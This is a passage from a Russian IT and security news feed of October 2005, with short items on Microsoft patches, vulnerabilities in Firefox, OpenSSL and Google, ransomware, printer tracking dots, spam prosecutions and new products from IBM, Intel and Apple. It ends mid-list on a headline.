В 2004 году IBM продала свой бизнес ПК Lenovo, однако в среду Big Blue намерена анонсировать продукт, демонстрирующий, что ее интерес к этому рынку не угас. Но это не просто ПК. IBM скомбинировала свои серверы BladeCenter с программным обеспечением ESX Server от VMware, позволяющим исполнять несколько операционных систем на одном компьютере, и с ПО Citrix Systems, которое обеспечивает пользователям доступ к работающим на сервере программам. Название новой технологии тоже сложнее, чем просто ПК: «Централизованная инфраструктура IBM с виртуальными клиентами» (IBM Virtualized Hosted Client Infrastructure). Однако компания уверена, что ее подход привлечет предприятия, желающие снизить расходы и упростить управление. IBM BladeCenter содержит 14 двухпроцессорных серверов в корпусе высотой 12,25 дюйма (311,15 мм). По словам нового вице-президента IBM по продуктам BladeCenter Дуга Балога, на каждом из этих серверов могут работать одновременно от 12 до 15 отдельных ПК. «Это позволит одному шасси BladeCenter обслуживать свыше 200 клиентов», — сказал он.
Подробности

19/10/2005 10:46 Лазерные принтеры оставляют на бумаге скрытую маркировку
Правозащитная организация Electronic Frontier Foundation (EFF), изучающая вопросы взаимоотношений высоких технологий и прав человека, сообщила, что ей удалось установить, что некоторые модели современных лазерных принтеров оставляют на бумаге скрытую маркировку, в которой закодированы дата и время печати документа, а также идентификатор принтера, пишет во вторник журнал Nature. Маркировка имеет вид едва заметных на бумаге желтых точек. Ранее они уже привлекали внимание специалистов, но теперь EFF удалось расшифровать, что именно они значат (для определения значения кода организация создала на своем сайте онлайновый декодер). Предположительно, эта особенность принтеров позволяет правоохранительным органам раскрывать некоторые преступления. EFF получила свои данные при работе с принтером серии Xerox DocuColor. По информации Nature, представитель Xerox подтвердил информацию о скрытом коде, отказавшись "по соображениям безопасности" уточнять что-либо на эту тему. Согласно данным исследования организации, скрытые точки на бумаге появляются вне зависимости от используемого при печати ПО и операционной системы, кроме того, в принтеры, по всей видимости, встроены автономные часы, так как кодируемое время не зависит от выставленного на компьютере. Сейчас эксперты EFF собирают свидетельства из разных стран мира и пытаются определить, в какие именно принтеры каких фирм встроена такая функциональность.
Источник

18/10/2005 12:18 Эксплоит уязвимости Firefox
На сайте milw0rm.com опубликован эксплоит уязвимости, обнаруженной недавно в браузере Firefox. Напомним, что уязвимость связана с некрректной обработкой параметра width тэга IFRAME. Как пишут сами авторы, уязвимости подвержены версии Firefox до (включительно) 1.0.7. Уязвимость отсутствует в 1.5 beta 2.
Эксплоит

18/10/2005 12:00 Microsoft обновила Media Centеr
Корпорация Microsoft выпустила обновление к своему продукту Media Center. Обновление получило название Windows XP Media Center Edition Rollup Update Version 2. Операционная система приведена в готовность к выходу новой консоли Xbox 360. Обновление включает «заплатки» на более чем 500 уязвимостей, что является рекордным числом. Патч поддерживает передачу видео высокого разрешения через домашние сети на консоль, обработку двух карт американской системы цифрового телевидения ATSC, просмотр и/или запись сразу 4-х программ, передачу в потоковом режиме программ высокой (HD) и нормальной четкости (SD) с ПК.
Источник

18/10/2005 10:56 Intel уменьшит время загрузки ПК
Intel продемонстрировала новую технологию Robson, которая укоротит раздражающее ожидание загрузки системы и приложений. ПК с технологией Robson извлекает данные и приложения не с жесткого диска, а из дополнительной карты флэш-памяти и ПО Intel. Флэш-память реагирует быстрее, чем жесткий диск, так что время загрузки сокращается. При этом у ноутбуков должен увеличиться срок службы батареи, так как меньше работает электродвигатель жесткого диска. Представительница Intel не привела точных цифр, но сказала, что Robson уменьшит время ожидания с момента нажатия на кнопку включения ПК до момента, когда на нем можно начинать работать, а также время перехода ПК из состояния ожидания в активное состояние и время запуска приложений. Карта Robson может вмещать от 64 Мбайт до 4 Гбайт памяти. Чем больше емкость, тем больше данных или приложений можно хранить на карте для ускорения их загрузки. Intel продемонстрировала технологию в понедельник на конференции Intel Developer Forum в Тайбее, но не сообщила, когда системы с такими картами поступят в продажу.
Источник

18/10/2005 10:11 Интернет-андэграунд намерен начать кибер-войну с "Кавказ-центром"
Один из посетителей нашего форума поделился с нами ссылкой на сайт peace4peace.com, на котором утверждается, что группа единомышленников организовала собственный фронт борьбы с печально известным сайтом "Кавказ-центра". Как написано на сайте, "Наша задача уничтожать ресурсы, ведущие террористическую пропаганду и преднамеренно искажающие факты. Законы военного времени развязывают нам руки, и мы будем использовать все доступные нам методы и средства! Наша цель - показать то, что мы едины в борьбе против террористов. Мы всего лишь участники хак-сообщества самый разных специальностей, большинство из нас уже давно находится по ту сторону закона, но это не мешает нам быть патриотами, ратующими за мир во всем мире. Мы отвергаем насилие, как способ решения политических проблем, и мы приложим все усилия, чтобы не допустить пропаганды экстремистского мировоззрения в нашем мире - мире интернета. На сегодняшний день начата крупномасштабная операция, мы вложили личного материала и оборудования стоимостью в десятки тысяч долларов, чтобы противостоять терроризму в интернете, выработали общую политику борьбы и избрали единое руководство". Всех желающих внести свой вклад призывают присоединиться к проекту. При этом не выдвигаются какие-либо требования финансовой поддержки, а всего лишь личное техническое участие.
Сайт проекта

18/10/2005 09:49 Microsoft обновляет опытную версию Windows Vista
В первом обновлении новой тестовой программы для специалистов Microsoft демонстрирует ряд новых возможностей Windows Vista, включая попытки усовершенствовать веб-браузер и сделать операционную систему более гибкой. Вышедший в понедельник релиз начинает серию ежемесячных обновлений версии Community Technology Preview (CTP), которую Microsoft использует для ускоренного сбора отзывов по сравнению с традиционными циклами бета-тестирования. Очередное обновление содержит ряд новшеств, включая усовершенствованную печать из Internet Explorer 7, а также новый Mobility Center, в котором собраны опции для ноутбуков, такие как новые параметры настройки системы управления потребляемой мощностью. «Изменений много, — комментирует продакт-менеджер по Windows Vista Майк Берк. — Мы ставим перед собой задачу неуклонно совершенствовать систему». В этот релиз также впервые вошли:
• «Сетевой центр», централизованный пульт управления сетевыми подключениями, заменяющий подкаталоги My Network Places и Network Neighborhood из Windows XP.
• Инструменты для подготовки и цифровой подписи документов в новом формате XML Paper Specification (XPS) с кодовым названием Metro.
• Ранняя версия Windows Media Player 11.
• Новые инструменты для диагностики сети и ПК, способные, например, обнаружить момент, предшествующий отказу жесткого диска, уведомить об этом пользователя и подсказать ему, как уберечь данные.
«Одна из целей, которые мы ставим перед собой — сделать ПК самовосстанавливающимся, чего в прошлом никогда не было», — сказал Берк.
Более подробно

18/10/2005 09:21 Петербургский суд рассматривает дело федеральных служб без сайтов
Дзержинский суд Санкт-Петербурга приступил к рассмотрению иска сотрудника Института развития свободы информации Юрия Вдовина о защите его конституционного права на получение информации, пишет во вторник газета "Коммерсант". Вдовин просит суд обязать несколько федеральных министерств и служб открыть свои сайты. По его словам, органы власти нарушают законы, гарантирующие гражданам право получать информацию. Так, открыть свои представительства в Интернете министерства и службы обязывает постановление правительства РФ ?98 от 12 февраля 2003 года "Об обеспечении доступа к информации о деятельности правительства РФ и федеральных органов власти". В документе также перечислена информация, которую необходимо разместить на этих сайтах. "Но не все это выполняют", - утверждает Вдовин, обращая внимание, что из 84 органов исполнительной власти не обзавелись собственными сайтами в сети семь: Федеральная служба по военно-техническому сотрудничеству, Федеральная служба по оборонному заказу, Министерство регионального развития, Федеральная служба финансово-бюджетного надзора, Федеральная служба судебных приставов, Федеральная служба охраны и Главное управление специальных программ президента.
Источник

17/10/2005 12:32 Руководство Microsoft предупреждает: В сети выложили фальшивый Windows XP SP3
Майк Бранниган (Mike Brannigan) – один из главных стратегов корпорации Microsoft сообщил, что обнаружен фальшивый «новый сервис-пак к Windows XP». Этот сервис-пак объявился на Hotfix.net, и сотни людей в мире его успели скачать и установить, прежде чем корпорация Microsoft обнаружила подделку и сообщила, что не имеет никакого отношения к данному продукту. Установка данного сервис-пака действительно исправляет часть ошибок в Windows XP, но калечит эту ОС, нарушает множество взаимосвязей и препятствует дальнейшему нормальному использованию Windows XP на этом компьютере. По словам Майка Браннигана, проведенное корпорацией Microsoft расследование показало, что этот сервис пак был опубликован в Google Group на основе «сырой заготовки» будущего сервис-пака и используется теперь как один из инструментов конкурентной борьбы с корпорацией Microsoft. Он также категорически не советовал пользователям устанавливать SP3, поскольку тот не имеет ни малейшего отношения к продуктам компании, а официальный Windows XP SP3 будет выпущен лишь в конце 2006 года. Однако, Эфан Ален (Ethan Allen) – создатель и владелец Hotfix.net имеет собственное мнение и рекомендует устанавливать этот сервис-пак, исправляющий пробелы в безопасности Windows XP, хотя он и не является официальным. Кроме того, он заявляет, что получил этот сервис-пак не из Google, а от одного из сотрудников Microsoft.
Источник

17/10/2005 11:53 Проект концепции информационной безопасности
13 октября в Минске состоялось заседание экспертного совета стран СНГ, на котором был рассмотрен Проект Концепции обеспечения информационной безопасности стран Содружества. Этот документ определяет цели, задачи и основные направления межгосударственного сотрудничества в обеспечении информационной безопасности. Для его реализации разработан Комплексный план мероприятий на период 2005-2008 годы. Основная задача, которая должна быть решена в этот период, – приведение к единому стандарту внутренних законов всех участников совещания в области информационной безопасности. В этом случае возникает эффективный механизм регулирования информационного пространства, противодействия преступлениям в области IT-технологий. Основные вопросы, которые были рассмотрены в Минске, относятся к таким областям информационной безопасности, как пресечение правонарушений в области высоких технологий, противодействие компьютерной преступности, борьба с вирусами, защита электронного документооборота.
Источник

17/10/2005 11:26 ФБР пресекло деятельность спамерской конторы, изъяв ее технику
В воскресенье стало известно, что в результате операции ФБР в минувшем сентябре была пресечена деятельность одной из крупнейших спамерских фирм США. Как заявил агентству Associated Press глава этой компании Алан Ральски (Alan M. Ralsky), в сентябре агенты ФБР пришли к нему в дом в пригороде Детройта и изъяли компьютеры, финансовую документацию и информационные носители. Информация об этом стала доступна после обнародования полицейской документации. По словам 60-летнего Ральски, постановления о прекращении деятельности фирмы ФБР не предъявило: "Они нас не закрывали. Они взяли все оборудование, в результате чего мы перестали работать". Ральски признал свою причастность к спамерской деятельности и сообщил, что располагает базой из более, чем 150 миллионов адресов. Название возглавляемой Аланом Ральски фирмы не уточняется, но уточняется, что речь идет об одном из наиболее крупных спамерских бизнесов мира. Известно, что в 2001 году против этой фирмы подавал иск крупный американский провайдер Verizon, обвинив спамеров в нарушении работы своей сети. Тогда дело удалось уладить без суда - фирма Ральски пообещала более не слать письма в сети Verizon.
Источник

17/10/2005 10:50 Начались поставки нового дистрибутива Suse Linux 10.0
Компания Novell начала поставки Suse Linux 10.0 - комплекта программного обеспечения для организации настольной рабочей среды на платформе Linux. Созданный в рамках проекта openSUSE, дистрибутив Suse Linux 10.0 отличается удобным пользовательским интерфейсом, который облегчает переход на Linux и работу с этой ОС. Впервые в истории разработки технологий Novell в создании продукта участвовало всемирное сообщество разработчиков ПО open source. В комплект поставки новой версии популярного дистрибутива, помимо ОС, входят более полутора тысяч приложений и пакетов ПО open source, в том числе офисные инструменты, веб-браузеры, клиент мгновенного обмена сообщениями, программы просмотра мультимедийных данных и графическое ПО. Кроме того, Suse Linux 10.0 содержит новые инструменты разработки приложений, установки домашней сети, эксплуатации веб-сервера и др. Коммерческая версия дистрибутива поставляется с подробной печатной документацией и поддержкой по инсталляции в течение 90 дней.
Подробности

17/10/2005 10:32 Нас ждет тотальная сетевая криминализация
Об очередном грядущем сетевом апокалипсисе поведал сайту CNews господин Евгений Касперский. Как пишет CNews, "По оценкам специалистов, в настоящее время около 75% хакерских атак носят ярко выраженный криминальный характер и направлены на взлом банковских счетов или получение не доступной иным путем информации. По прогнозам, общее число подобных случаев будет увеличиваться в ближайшее десятилетие. Среди жертв – как домашние пользователи, так и крупные корпорации. По словам руководителя антивирусных исследований «Лаборатории Касперского» Евгения Касперского, если 10 лет назад первые хакеры рассылали вирусы из чисто хулиганских соображений, то сейчас ситуация резко изменилась. Общий ежегодный ущерб мировой экономике от хакеров, по самым скромным подсчетам, оценивается в $1 млрд. Были случаи, когда отдельным лицам удавалось взламывать банковские счета на сумму около $500 млн". Разумеется, помимо общей констатации фактов, предложены и меры борьбы: "По твердому убеждению Евгения Касперского, тактика антивирусных компаний должна быть изменена. В числе приоритетных задач он называет постоянный и быстрый анализ антивирусной защиты и возможность оперативного реагирования, разработку автоматических систем по обнаружению вирусов, регулярное написание апдейтов. В «Лаборатории Касперского» наиболее вероятными будущими жертвами хакеров называют обладателей смартфонов, а также жильцов квартир с автоматизированными бытовыми устройствами, подключенными к компьютерной сети (так называемые «умные дома»)".
Подробности

16/10/2005 12:29 Red Hat сертифицирует специалистов по безопасности — RHCSS
Компания Red Hat представила новую программу сертификации для IT-специалистов, работающих с ОС Linux. Курсов и экзамены направлены на подготовку специалистов по IT-безопасности. Успешно сдавшие экзамен будут получать статус Red Hat Certified Security Specialist (RHCSS). Данная программа, таким образом, становится третьей в линейке курсов Red Hat: помимо нее есть еще программы RHCE (Red Hat Certified Engineer) и RHCA (Red Hat Certified Architect). В программу курсов входят такие темы, как защита сетевых сервисов, создание систем аутентификации и авторизации, обучение работы с электронными сертификатами. В данный момент специалисты определяют целесообразность включения в курс тем, затрагивающих работу в частных виртуальных сетях (VPN) и работу с межсетевыми экранами.
Подробности

16/10/2005 11:42 Microsoft предупреждает о возможных проблемах после установки MS05-051
Microsoft предупреждает о возможных проблемах после установки исправления MS05-051 для COM+ и MS DTC, если были изменены разрешения по умолчанию на директорию %windir% egistration, сообщает securitylab.ru. В результате пользователи будут не в состоянии войти на компьютер, многие приложения и системные службы перестанут запускаться: не запустится служба Windows Firewall; не запустится служба Windows Installer; Папка Network Connection будет пустой; Active Server Pages (ASP) будут выдавать “HTTP 500 – Internal Server Error” ошибку; Не запустится служба Microsoft COM+ EventSystem; Не смогут работать COM+ приложения; Нельзя будет развернуть дерево Microsoft Component Services Microsoft Management Console (MMC); Зарегистрированные пользователи не смогут войти в систему. Для устранения проблем, которые могут быть вызваны установкой MS05-051 патча, пользователи должны восстановить разрешения по умолчанию на Windows каталог и COM+ каталог.
Подробное описание

16/10/2005 11:07 Blizzard защищает WoW с помощью spyware
Каждые 15 секунд программа-"привратник", автоматически загружаемая с близзардовских серверов при подключении к World of Warcraft, проделывает с компьютерами 4.5 миллионов игроков следующее:
- получает список всех dll, отображенных в адресное пространство исполняемого файла игры;
- использует функцию GetWindowTextA для получения заголовков всех окон в системе, проверяя их на совпадение со строками из черного списка;
- подключается к каждому запущенному процессу и с помощью функции ReadProcessMemory считывает ряд адресов в диапазоне с 0x0040xxxx по 0x0041xxxx.
В своем комментарии Blizzard замечает, что в подобном сканировании нет ничего незаконного, что так защищаются многие игры, что предупреждение о возможных проверках записано в EULA (во-первых, кто ж его читал, во-вторых, договоры, противоречащие текущему законодательству, любым судом будут признаны ничтожными), и что вообще человек, обнародовавший эту информацию, занимается разработкой hack/cheat-программы для WoW (попросту говоря, бота). Мнения игроков разделились, сообщает bugtraq.ru.
Подробности

16/10/2005 10:46 На виртуальных машинах - дешевле
Согласно новой схеме лицензирования, вводимой Microsoft, покупатели операционной системы Windows Server 2003 R2 Enterprise Edition, которая выйдет в этом году, смогут исполнять ее копии на четырех виртуальных машинах, работающих поверх основной. Пользователям Standard Edition без дополнительной оплаты можно будет инсталлировать ОС лишь на одну виртуальную машину. Аналогичные условия будут действовать для следующей версии серверной ОС Microsoft, Longhorn, которая выйдет в 2007 году. Одна из редакций ОС, Datacenter, позволит исполнять неограниченное количество виртуальных машин. Корпорация также изменила структуру лицензирования своих серверных программных продуктов, таких как SQL Server, для применения на виртуальных машинах. За те из них, которые не используются в активном режиме, а развернуты в качестве резерва на случай сбоя основной системы, платить не придется. Со временем Microsoft реализует поддержку возможности мониторинга использования ее ПО на виртуальных машинах в составе инструментария Microsoft Operations Manager.
"Открытые системы"

16/10/2005 10:34 В США судят злостных CD-пиратов
Федеральное Большое жюри США признало троих жителей страны виновными по делу о крупнейшем пиратстве компакт-дисков: они записали 325 тысяч болванок с пиратской музыкой и программным обеспечением. 29-летний Йе Тен Вень (Ye Teng Wen), 30-летний Хао Хэ (Hao He) и 33-летний Яобин Чжай (Yaobin Zhai), живущие в пригороде Сан-Франциско, были арестованы на прошлой неделе. Двое из них — граждане США, а один имеет разрешение на работу в стране. Обвиняемых выпустили под залог до суда 27 октября, который вынесет приговор. "Масштабное пиратство музыки и программного обеспечения отражает потенциальные миллионные потери для артистов и бизнесменов, которые законно владеют авторскими правами на эти работы, — сказал прокурор США Кевин Райан (Kevin Ryan). — Эти лица обвинены в установке контрафактных наклеек на компакт-диски для того, чтобы создать видимость легальности, в том числе — антипиратского предупреждения ФБР «несанкционированное копирование преследуется по федеральному закону». Пираты записывали латинскую музыку и программы защиты Symantec, купив оригиналы в магазине, сообщил Reuters.
Источник

16/10/2005 10:12 Минобрнауки стало рассадником ИТ-порока
Министерство образования РФ подстрекает российскую молодежь к нарушению Уголовного кодекса. В частности, на одном из подведомственных сайтов посетителям предлагается взломать программу MathType. По словам экспертов, такую деятельность чиновников вполне можно расценить как уголовное преступление. На портале информационной поддержки Единого государственного экзамена, созданного Федеральной службой по надзору и в сфере образования и науки (подведомственная служба Минобрнауки РФ), можно найти ознакомительные варианты ЕГЭ за 2006 год. Если скачать пример заданий по математике, можно сильно удивиться, увидев предложение взломать программу MathType, которая необходима для корректной распечатки файла контрольно-измерительных материалов (КИМ). В частности в файле с примером ЕГЭ по математике есть такие слова: "Для правильной распечатки файла демонстрационного варианта КИМ по математике необходимо установить на компьютере программное обеспечение MathType версии не ниже 5.0 (см. примечание в конце файла)". В самом же примечании без лишней стеснительности написано следующее: "Продление срока действия (at your own risk!!!)" – и стоит ссылка на программу-взломщик.
Более подробно

16/10/2005 09:49 Virus.Win32.JuNy.b — новое интернет-вымогательство
Как сообщает "Лаборатория Касперского", ими были получены несколько писем от пользователей, заразившихся вирусом JuNy.b. Вирус шифрует файлы на диске компьютера, после чего пострадавшим предлагается их расшифровать за $20. Virus.Win32.JuNy.b детектируется и обезвреживается Антивирусом Касперского с 29 сентября. При заражении рекомендуется связаться с "ЛК" по адресу newvirus@kaspersky.com. Признаками заражения является невозможность открыть некоторые файлы на жестком диске и появление на рабочем столе или в папке для временных файлов текстового файла с названием «П*****_к_вам_в_гости!.TXT». В настоящее время случаи заражения данным вирусом зафиксированы только в России.
Источник

16/10/2005 09:36 Безопасность сетевого стека OpenBSD
SecurityFocus берёт интервью у трёх разработчиков OpenBSD по поводу защиты сетевого стека этой ОС против атак вида DoS ICMP, а также их мысли насчёт Linux'a и несколько слов об OpenBGPD.
Интервью

16/10/2005 09:13 Microsoft поможет Нигерии бороться с "нигерийским спамом"
Корпорация Microsoft намерена помочь Нигерии бороться с интернет-мошенничеством, известным как "нигерийский спам", сообщает BBC News. Эксперты корпорации намерены взять на себя техническое оснащение и обучение нигерийских служб, борющихся с интернет-мошенничеством. "Они помогут нам в одной из самых трудных областей - технологической, а мы берем на себя принятие конкретных мер, - пояснил Нуху Рибаду, глава нигерийской Комиссии по борьбе с экономическими преступлениями. - Мы работаем с ними уже шесть месяцев и в результате этой работы готовы привлечь к ответственности несколько компаний. Над несколькими людьми уже идет суд". Напомним, что в августе 2005 года власти Нигерии заявили, что 3-летние усилия по борьбе с "нигерийскими спамерами" не прошли даром и уже можно говорить об ощутимых результатах этой деятельности. По данным, которые обнародовал Рибаду, в период с мая 2003 года по июнь 2004 власти изъяли у подозреваемых в интернет-мошенничестве лиц денег и имущества на сумму около 700 миллионов долларов. Арестовано более 500 подозреваемых, в судах рассматривается более 100 дел, еще около 500 расследуются.
Источник

15/10/2005 10:40 Apple берет курс на видео
В среду компания Apple Computer представила видео-iPod, о котором ходило много слухов, а также новый iMac и модернизированную версию службы iTunes, которая позволяет покупать видеозаписи, ТВ-программы и кинофильмы. iPod «принес нам огромный успех, и пришло время его заменить, — сказал генеральный директор Apple Стив Джобс, продемонстрировав новый МР3-плеер на презентации в Сан-Хосе. — Да, кстати, теперь у него есть видео». Музыкальные плееры с 2,5-дюймовым экраном, в черном или белом корпусе, будут продаваться по $299 за 30-Гбайт модель и по $399 за 60-Гбайт. Устройство вмещает до 15 тыс. песен, 25 тыс. фотографий или свыше 150 часов видео. Джбос представил также новый настольный компьютер iMac G5, который напоминает существующую модель, но несколько тоньше нее. 17-дюймовая версия с 1,9-ГГц процессором стоит $1299; а 20-дюймовая с процессором 2,1 ГГц — $1699. Компьютеры Apple будут поставляться со встроенной камерой iSight типа Webcam, которая делает фотоснимки и вводит видеоизображения, и с новым пультом дистанционного управления, который позволяет управлять аудиозаписями, фотографиями и видео с расстояния 10 м. Apple products Во время презентации Джобс, манипулируя маленьким белым пультом ДУ, напоминающим iPod Shuffle, демонстрировал видеоклипы группы Black Eyed Peas и DVD «Incredibles» (Суперсемейка), а также любительские видеозаписи и фотографии. Вместе с пультом ДУ Джобс представил новые мультимедийные функции iMac под названием Front Row, которые позволят наслаждаться видео, музыкой и фотографиями «не вставая с дивана».
Подробности

15/10/2005 09:36 Британский банк выдаст каждому клиенту антихакерский брелок
Британский банк Lloyds TSB намеревается провести массовый тест нового устройства, призванного обеспечить большую безопасность работы клиентов с банковскими технологиями в Интернете, собщает BBC News. Как известно, в последнее время все большее число людей работает со своими банковскими счетами через системы интернет-банкинга, также активно развиваются специальные платежные системы, работающие отдельно от банков. Люди управляют платежами через Интернет, но постоянно подвергаются риску остаться без своих безналичных денег из-за интернет-мошенников, которые пытаются перехватить данные для авторизации с помощью технологии, называемой "фишинг" (рассылка спама с просьбой подтвердить пароль) или с помощью различных хакерских технологий - например, внедрения в компьютер жертвы "шпиона" и перехвата данных с клавиатуры. Устройство-брелок, которое будет выдано тестирующей группе из 30 тысяч человек, имеет небольшой ЖК-экран, где оно по запросу показывает сгенерированный шестизначный код, действующий только 30 секунд. Этот код нужно ввести при входе в систему интернет-банкинга Lloyds наравне с логином и паролем. Предполагается, что таким образом хакеры не смогут перехватить код заранее, так как он будет введен с клавиатуры только один раз и быстро перестанет действовать. В следующий раз устройство сгенерирует новый код.
Источник

12/10/2005 12:44 Вышел новый кумулятивный патч для Internet Explorer
Корпорация Microsoft выпустила очередной кумулятивный патч для браузера Internet Explorer различных версий. Обновление устраняет опасную уязвимость, которая теоретически позволяет злоумышленникам получить несанкционированный доступ к удаленным компьютерам. В случае успешной реализации атаки нападающие могут выполнять на машине жертвы произвольные операции, в том числе устанавливать новые программы, просматривать, модифицировать или удалять файлы, а также создавать дополнительные пользовательские аккаунты с правами администратора. Проблема связана с ошибками, возникающими при обработке COM-объектов. Сценарий атаки сводится к созданию и размещению в интернете специальной веб-страницы. При просмотре такого сайта с помощью Internet Explorer на машине жертвы происходит повреждение данных в памяти, что провоцирует запуск вредоносного кода. Брешь, охарактеризованная как критически опасная, присутствует в браузерах Internet Explorer версий 5.0, 5.5 и 6.0. Кроме того, корпорация Microsoft устранила другую дыру в IE версии 6.0 (при работе на компьютерах с операционной системой Windows 2000 и четвертом сервис-паком). Уязвимость позволяет без ведома пользователя изменить директорию для сохранения загружаемых с FTP-сервера файлов со специально сформированным именем. Впрочем, сама по себе данная брешь не может использоваться с целью захвата контроля над удаленной машиной, и поэтому получила статус умеренно опасной.
Источник

12/10/2005 11:24 Microsoft заделала многочисленные дыры в Windows
Во вторник, 11 октября корпорация Microsoft выпустила очередную серию патчей для своих программных продуктов. Наибольшее количество дыр обнаружено в операционных системах Windows различных версий, причем некоторые из уязвимостей могут использоваться с целью получения полного доступа к удаленным компьютерам. Критически опасная брешь обнаружена в службе координации распределенных транзакций Microsoft (Microsoft Distributed Transaction Coordinator, MSDTC). Для реализации нападения необходимо послать жертве сформированные специальным образом запросы. В случае успешного проведения атаки злоумышленники получат возможность выполнить на машине произвольные деструктивные действия. Дыра представляет наибольшую угрозу для пользователей ОС Windows 2000, однако патчи также настоятельно рекомендуется загрузить и на компьютеры с Windows ХР и Windows Server 2003. Еще одна уязвимость, охарактеризованная как критически опасная, выявлена в модуле DirectShow. Для проведения атаки достаточно вынудить жертву открыть специально созданный файл в формате AVI, обработка которого спровоцирует ошибку переполнения буфера и последующий запуск произвольного вредоносного кода. Брешь присутствует в операционных системах Windows 98/ME/200/XP, а также Windows Server 2003. Несколько дыр в Windows получили статус важных. Одна из этих уязвимостей связана с особенностями обработки операционными системами определенных HTML символов в полях предварительного просмотра и сформированных специальным образом файлов с расширением LNK. Теоретически брешь позволяет получить несанкционированный доступ к удаленному компьютеру. Заплатки рекомендуется установить пользователям Windows 2000, Windows ХР и Windows Server 2003. Дыра в компоненте Collaboration Data Objects (CDO) также может применяться для выполнения произвольного кода на машине, для чего нужно послать жертве особые пакеты данных. Уязвимость присутствует в Windows 2000/ХР/Server 2003 и Microsoft Exchange 2000 Server. Две другие опасные уязвимости найдены в службах Plug and Play и Client Service for NetWare (CSNW). В обоих случаях результатом атаки может стать выполнение произвольного программного кода на ПК жертвы. Заплатки выпущены для операционных систем Windows 2000 и Windows ХР, а в случае с дырой в CSNW - еще и для Windows Server 2003 (в том числе с первым сервис-паком). Наконец, еще одна уязвимость в Windows охарактеризована как умеренно опасная. Проблема связана со службой контроля сетевых соединений Network Connection Manager. Направив жертве серию специальных пакетов данных, нападающий может спровоцировать DoS-атаку. Патчи выпущены для операционных систем Windows 2000, Windows ХР и Windows Server 2003.
Октябрьский выпуск патчей

12/10/2005 10:59 Интервью с Кевином Митником
На сайте информационного агенства CNN опубликовано интервью, которое корреспондент Manav Tanneeru взял у самого, пожалуй, известного хакера современности Кевина Митника. Интервью довольно занимательное - в нём, например, Кевин говорит, что никогда не взламывал NORAD ( North American Aerospace Defense Command) и ФБР. Также из интервью можно узнать, что методы социальной инженерии до сих пор не потеряли своей актуальности; что Кевин доверяет банковским операциям, совершаемым в Интернете и многое другое.
Интервью

12/10/2005 10:36 Уязвимость в OpenSSL
Обнаружена уязвимость во всех версиях OpenSSL (не включая 0.9.7h и 0.9.8a), сообщает linux.org.ru. Версии 0.9.7h и 0.9.8a выпущены, чтобы исправить эту уязвимость. Потенциально могут быть затронуты все приложения которые используют реализации SSL/TLS предоставляемые с помощью библиотеки OpenSSL. Приложения подвержены уязвимости, если они используют опцию SSL_OP_MSIE_SSLV2_RSA_PADDING. Эта опция запрещает шаг верификации в SSL 2.0 сервере. Атакующий, используя атаку типа "man in the middle", может принудить клиента и сервер к согласованию на протоколе SSL 2.0, даже если стороны поддерживают SSL 3.0 или TLS 1.0. Между тем протокол SSL 2.0 известен как слабозащищенный и поддерживаетcz только как запасной. Приложения не использующие ни SSL_OP_MSIE_SSLV2_RSA_PADDING, ни SSL_OP_ALL не подвержены уязвимости. Приложения которые запрещают использование SSL 2.0 также не подвержены.
Подробности

12/10/2005 10:13 ПО Citrix в 64-разрядном варианте
Citrix Systems выпустила свой основной продукт в версии для 64-разрядных процессоров. Citrix Presentation Server 4.0 for Windows Server 2003 x64 позволит исполнять на сервере как 64-, так и 32-разрядные приложения. Независимо от "разрядности" все они будут доступны в терминальном режиме на любом устройстве с клиентским программным обеспечением Citrix. Как заявляют в компании, если установить систему на сервер с двумя двухъядерными 64-разрядными процессорами архитектуры x86, она сможет обслуживать примерно вдвое больше пользователей, чем 32-разрядная версия, работающая на машине с таким же количеством процессоров.
"Открытые системы"

12/10/2005 09:50 OASIS передала OpenDocument для утверждения в качестве стандарта
Группа, поддерживающая стандарт OpenDocument, передала формат документов в организацию по стандартизации — это должно сделать настольные приложения open source более привлекательными для госучреждений. Организация по продвижению стандартов для структурированной информации (OASIS) передала стандарт в Международную организацию по стандартизации (ISO). OpenDocument — это набор форматов документов для настольных приложений, включая текстовые процессоры, электронные таблицы и ПО для подготовки презентаций. Первая версия стандарта была утверждена OASIS в начале этого года и используется в наборе продуктов с открытым исходным кодом OpenOffice. В этом месяце OASIS объявила о передаче спецификации OpenDocument в Объединенный технический комитет Электротехнической комиссии ISO (ISO/IEC JTC1) для утверждения в качестве стандарта. OASIS будет продолжать развитие и поддержку OpenDocument, но надеется, что стандартизация через ISO сделает форматы документов более доступными. «Мы убеждены, что утверждение форматов OpenDocument комиссией ISO/IEC JTC1… послужит официальным одобрением, сделав OpenDocument еще более доступным для его сторонников — особенно тех, кто внедряет бизнес-решения для государственных учреждений, — которые ждут утверждения ISO как гарантии долговечности», — говорит представитель OASIS Кэрол Гейер.
Подробности

12/10/2005 09:26 Microsoft заплатит RealNetworks 761 миллион долларов
Корпорация Microsoft согласилась выплатить компании RealNetworks 761 миллион долларов для того, чтобы уладить антимонопольное разбирательство, в котором RealNetworks обвиняла крупнейшего производителя ПО в мире в использовании своего доминирующего положения на рынке для продвижения своего медиаплеера, сообщает Reuters. В частности, представители RealNetworks утверждали, что бесплатно прилагаемый к Windows медиаплеер негативно повлиял на продажи продуктов компании. Не выдержав конкуренции с Windows Media Players, разработанным Microsoft, компании пришлось переориентировать свой бизнес на предоставление онлайновых музыки и игр. После объявления о решении Microsoft акции RealNetworks выросли на 34 процента, так как сумма, которую компания получит от создателей Windows, пойдет на развитие и создание новых программных продуктов. Так, 460 миллионов долларов пойдут на возмещение ущерба, причиненного RealNetworks, а 301 миллион будет использован для продвижения услуг RealNetworks на сайте MSN Music. Кроме того, компания получит доступ к технологиям, использованным в Windows Media, что позволит ей улучшить свой продукт - RealPlayer.
Источник

11/10/2005 12:52 Google исправил XSS-уязвимость
Уязвимость, связанная с реализацией Google's AdWords, могла привести, например, к перехвату аккаунтов на гугле и прочим неприятностям, появляющимся вместе с возможностью подсунуть произвольный код на JavaScript другому пользователю. Дырка была обнаружена Finjan Software и исправлена Google в течение 30 часов, стороны остались взаимно довольны, сообщает bugtraq.ru.
Подробности

11/10/2005 12:21 Уязвимость в KAV
